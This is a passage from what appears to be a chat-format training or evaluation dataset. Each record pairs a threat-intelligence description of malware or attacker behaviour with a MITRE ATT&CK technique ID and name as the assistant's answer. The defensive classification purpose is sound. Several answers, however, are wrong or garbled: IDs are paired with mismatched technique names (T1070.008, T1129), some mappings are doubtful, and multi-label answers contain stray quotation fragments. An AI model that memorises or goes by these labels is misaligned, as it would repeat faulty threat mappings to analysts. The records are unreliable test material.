exfiltrated by the attackers using one of the AZZY implants" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging', 'T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When issuing a beacon to its C2, PingPull will send an Echo Request packet to the C2 server with total and current set to 0 and will include no encoded and encrypted data, as seen in Figure 1." }, { "role": "assistant", "content": "T1132 - Data Encoding', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox can decrypt AES-encrypted files downloaded from C2." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can send collected data to cloud storage services such as PCloud." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "looks for net and account or domain in close proximity" }, { "role": "assistant", "content": "T1201 - Password Policy Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These files are then transmitted to a threat actor, often over commonly open ports 80 and 443 (HTTP and HTTPS)" }, { "role": "assistant", "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon has the ability to use anti-detection functions to identify sandbox environments." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has used publicly available tools to dump password hashes, including HOMEFRY." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain: “Gmail -” “Yahoo – login” “Sign In -” “Outlook.com -“ MPK will attempt to parse these window titles to identify the associated email address and record these to the log file using the following format: ///////////// Mail Find /////////// If the Trojan does not find the window titles associated with Gmail, Yahoo or Outlook, it saves the title to the “Save.tmp” file in the following format: +++++++++++++ Window= +++++++++++++ The major difference between the IRC variant and non-IRC variant of MPK is the C2 protocol used" }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can use the clientgrabber module to steal e-mail credentials from the Registry." }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Watering holes - Weaponized documents exploiting the Dynamic Data Exchange (DDE) method - Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor - Exploitation of the CVE-2019-0604 vulnerability in Sharepoint - Supply chain attack that compromises a chat software installer, Able Desktop - Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server" }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain', 'T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky can shutdown the infected machine." }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy leverages WMI to enumerate anti-virus on the victim." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent.btz saves system information into an XML file that is then XOR-encoded." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FALLCHILL can modify file or directory timestamps." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro has used compromised websites and Google Ads to bait victims into downloading its installer." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts the collected files using 3-DES." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the file path name combinations observed was ‘C:\\ProgramData\\Dacr\\macrse.exe’, also configured in a Crimson “Main Client” sample and used for saving the payload received from the C2 when invoking the usbwrm command" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has used compromised domains to host links targeted to specific phishing victims." }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ProLock can use .jpg and .bmp files to store its payload." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The IceApple Directory Lister module can list information about files and directories including creation time, last write time, name, and size." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Komplex C2 channel uses HTTP POST requests." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HELLOKITTY can search for specific processes to terminate." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can gather information about a tenant’s domains using public Microsoft APIs." }, { "role": "assistant", "content": "T1590.001 - Domain Properties" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 4 x_mode command and new line delimited settings As seen in Figure 4, the settings are stored in variables seen in Table 6, which are used to authenticate to the actor-controlled Google account before uploading and downloading files from Google Drive" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RedLeaves can gather browser usernames and passwords." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has obtained and used open-source tools such as Mimikatz." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task" }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SoreFang can use HTTP in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses rundll32.exe to load its DLL." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a cleanup module that removes traces of itself from the victim." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The string is visible within the unpacked Karagany binary and is not itself encrypted. Once the payload has been AES-encrypted, it is prepended with the IV value and Base64-encoded for transmission. Figures 4 and 5 show an example decode and decryption based on sinkhole data obtained by CTU researchers of a Karagany beacon payload" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity.Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some variants of Cherry Picker use AppInit_DLLs to achieve persistence by creating the following Registry key: \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"\"" }, { "role": "assistant", "content": "T1546.010 - Event Triggered Execution: AppInit DLLs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has used the BOtB tool that can break out of containers." }, { "role": "assistant", "content": "T1611 - Escape to Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST masqueraded its network traffic as the Orion Improvement Program (OIP) protocol." }, { "role": "assistant", "content": "T1001.003 - Protocol or Service Impersonation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This file is written to the following file path: % TEMP%\\Update.~tmp After the file is written, it is then copied to a filename of ’winhelp.cpl’ in the directory that was initially chosen" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1036 - Masquerading', 'T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Goopy has the ability to delete emails used for C2 once the content has been copied." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host', 'T1070.008 - Email Collection: Mailbox Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After defining several variables, some of which contain ActiveX objects for file execution and manipulation later, the script uses a function to “roll” a random number" }, { "role": "assistant", "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used \"net start\" and \"net use\" for system service discovery." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial beacon packet for S-Type contains the operating system version and file system of the victim." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 also moved laterally to servers in the environment using RDP and configured them as malware “distribution” servers. The distribution servers were used to stage the LockerGoga ransomware, additional utilities, and deployment scripts to automate installation of the ransomware. Mandiant identified a utility script named kill.bat that was run on systems in the environment. This script contained a series of anti-forensics and other commands intended to disable antivirus and destabilize the operating system. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. These BAT files contained psexec commands to connect to remote systems and deploy kill.bat along with LockerGoga. FIN6 renamed the psexec service name to “mstdc” in order to masquerade as the legitimate Windows executable “msdtc" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used the Steam community page as a fallback mechanism for C2." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts" }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes has used Installutill to download content." }, { "role": "assistant", "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire has modules for executing scripts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module in Prikormka collects information from the victim about the current user name." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware has evolved over time" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The installer loads a DLL using rundll32." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can retrieve and execute additional payloads from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has performed frequent and scheduled data collection from victim networks." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay has included a rootkit to evade defenses." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The last type of shellcode is a Cobalt Strike stager. We have confirmed the use of several different Cobalt Strike stager shellcodes since October 2019. In addition, some of the observed Cobalt Strike stager samples included a setting in the HTTP header of their malicious communications to disguise them as common jQuery request in order to evade detection by security products." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter has hosted open-source remote access Trojans used in its operations in GitHub." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SynAck gathers user names from infected hosts." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals." }, { "role": "assistant", "content": "T1591 - Gather Victim Org Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In our tests, running Valak from a U.S. location on a vulnerable Windows 10 host returned a banking Trojan called IcedID as the follow-up malware. In one case, we saw both IcedID and NetSupport Manager RAT-based malware delivered as follow-up malware on a Windows 7 host from June 2020" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo had used AutoIt to load and execute the DLL payload." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping', 'T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Felismus collects the victim LAN IP address and sends it to the C2 server." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can use HTTP/S in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used malware that can collect the victim’s OS version and machine name." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sakula also leverages single-byte XOR encoding to obfuscate various strings and files embedded in the resource section, which are subsequently used for User Account Control (UAC) bypass on both 32 and 64-bit systems. Analysis . CTU researchers performed detailed analysis on 346 Sakula samples, including the installer and all dropped files used by the malware to run. Source: Dell SecureWorks) . Installation . In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe: The registry value and filename vary by sample. Three of the analyzed samples placed files in %APPDATA%, while the remaining Sakula samples placed files in a directory under %ALLUSERSPROFILE%. A small number of samples did not use an additional subdirectory. The msi.dll file is configured to read and XOR-decode setup.msi, also located in the same directory, and run it in memory. Based on whether the compromised system is 32-bit or 64-bit, the appropriate file is written and run using cmd.exe calling rundll32 on the DLL with the PlayWin32 or PlayWin64 export. Center509671.dat). In a small group of Sakula samples from 2013, the install process also modified the hosts file to point some of the victim's subdomains to various IP addresses within the victim's own organization. The malware also registered a file as a command component within the registry. In the Sakula samples where the install process performed cleanup, the malware invoked cmd.exe" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC)." }, { "role": "assistant", "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has disabled \"iptables\"." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FinFisher uses token manipulation with NtFilterToken as part of UAC bypass." }, { "role": "assistant", "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don’t have any content with social engineering directing potential victims to click an Enable Content button" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHUTTERSPEED can download and execute an arbitary executable." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Persistence Mechanism Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "15 Database dump Decoded, it reveals a detailed log of each affected machine" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GeminiDuke collects information on running processes and environment variables from the victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TYPEFRAME can install encrypted configuration data under the Registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll\" and \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { 